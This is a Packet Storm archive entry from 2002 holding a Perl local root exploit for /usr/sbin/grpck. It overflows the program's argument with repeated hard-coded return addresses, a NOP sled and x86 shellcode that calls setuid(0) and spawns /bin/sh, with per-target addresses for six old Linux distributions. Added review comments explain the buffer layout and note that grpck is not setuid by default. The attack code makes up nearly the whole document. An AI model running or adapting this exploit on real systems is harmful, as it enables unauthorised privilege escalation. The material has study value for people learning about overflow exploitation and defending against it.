grpck-expl.pl

2002-11-19T00:00:00
ID PACKETSTORM:30493
Type packetstorm
Reporter Black Rose
Modified 2002-11-19T00:00:00

Description

                                        
Hi packetstorm dudez!
  
--- start here ---  
#!/usr/bin/perl  
  
# www.uhagr.org - ghostian@linuxmail.gr   
  
# This is only a Proof of concept.   
# /usr/sbin/grpck is not suid root by default.  
  
# castle:~ # /usr/sbin/grpck `perl -e 'print "X"x2900'`  
# Segmentation fault  
# castle:~ #  
  
# NOTE(review): the script builds one 4800-byte string (2900 bytes of a
# repeated address + 1847 pad bytes + a 53-byte payload, see below) and
# passes it as the first argument to /usr/sbin/grpck; the repro above only
# shows that a 2900-byte argument crashes the binary. As the author notes,
# grpck is not setuid by default, so on such an install the program runs
# with the caller's own privileges and the "r00t" claim in the usage text
# does not apply -- it presumes a setuid-root grpck. Each target relies on
# a fixed, hard-coded address, so the outcome is tied to the exact build
# and stack layout of the listed distributions.
# There is no `use strict`/`use warnings`: every variable below is a
# package global and $buffer is never initialised (starts as undef).
my $usage = <<x;  
  
[ uhagr team -ghostian -extraneous ]   
-- grpck Local r00t exploit --   
  
Usage: ./grpck-expl.pl <target>  
Example: ./grpck-expl.pl 1  
  
TARGETS:  
[ 1 ] SuSE Linux 7.2  
[ 2 ] RedHat Linux 8.0   
[ 3 ] RedHat Linux 7.3  
[ 4 ] RedHat Linux 7.2  
[ 5 ] Debian Linux 2.2  
[ 6 ] Mandrake Linux 8.2  
x  
  
# Target index is the first (and only) command-line argument; any other
# arguments are ignored.
$target = ($ARGV[0]);  
  
# Hard-coded 53-byte x86 Linux payload; the only readable part is the
# trailing "/bin/sh" string it references.
$shellcode =   
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" .  
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" .  
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" .  
"\x80\xe8\xdc\xff\xff\xff/bin/sh";  
  
# No target given (or target "0"): print the usage text and stop.
if (!$target) { print "$usage\n"; exit; }  
  
# Per-target parameters. $ret and $offset are summed into the address that
# is repeated through the first part of the buffer; $buf is the byte length
# of that repeated region, $egg the size budget for the pad+payload region,
# $nop the pad byte. Only $ret and $offset differ between targets -- $buf,
# $egg and $nop are identical in all six branches. The branches are
# independent `if`s with no final `else`, so an unknown target number falls
# through with every parameter still undef (pack() below then yields a
# zero address and the pad loop appends empty strings).
if ($target eq '1') {  
$ret = 0xbfffe514;  
$offset = 940;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: SuSE Linux 7.2\n";  
}  
  
if ($target eq '2' ) {  
$ret = 0xbfffe5bc;  
$offset = 851;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 8.0\n";  
}  
  
if ($target eq '3' ) {  
$ret = 0xbfffef94;  
$offset = 1812;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 7.3\n";  
}  
  
if ($target eq '4' ) {  
$ret = 0xbfffe73c;  
$offset = 645;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: RedHat Linux 7.2\n";  
}  
  
# NOTE(review): the usage text lists target 5 as "Debian Linux 2.2" but
# this branch reports "Debian Linux 3.0r0" -- one of the two labels is
# stale; the address/offset pair can only be right for one of them.
if ($target eq '5' ) {  
$ret = 0xbfffe934;  
$offset = 1541;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: Debian Linux 3.0r0\n";  
}  
  
if ($target eq '6' ) {  
$ret = 0xbffff0ae;  
$offset = 1859;  
$buf = 2900;  
$egg = 2000;  
$nop = "\x90";  
print "\n Target: Mandrake Linux 8.2\n";  
}  
  
  
# 'l' packs a native-endian signed 32-bit long; on the i386 systems listed
# above that is little-endian. Run on a 64-bit or big-endian host the
# encoding would differ, which is one more reason the targets are so narrow.
$addr = pack('l', ($ret + $offset));  
# Repeat the 4-byte address until $buf (2900) bytes have been appended
# (725 iterations).
for ($i = 0; $i < $buf; $i += 4) {  
$buffer .= $addr;  
}  
  
# Then ($egg - length($shellcode) - 100) = 1847 copies of the pad byte,
# leaving a 100-byte margin inside the $egg budget.
for ($i = 0; $i < ($egg - length($shellcode) - 100); $i++) {  
$buffer .= $nop;  
}  
  
# Payload goes last; total argument length is 2900 + 1847 + 53 = 4800 bytes.
$buffer .= $shellcode;  
print "r00t?\n";   
# List-form exec, so no shell is involved and $buffer is passed as-is as
# argv[1]. The trailing 0 is not a C-style argv terminator: Perl passes it
# as a third argument, the string "0". If exec fails nothing reports it --
# the script simply continues to the end and exits.
exec("/usr/sbin/grpck", $buffer,0);  
  
# Have a nice night ;]  
--- cut here ---  
  
Thanks!  
The uhagr team  
  
  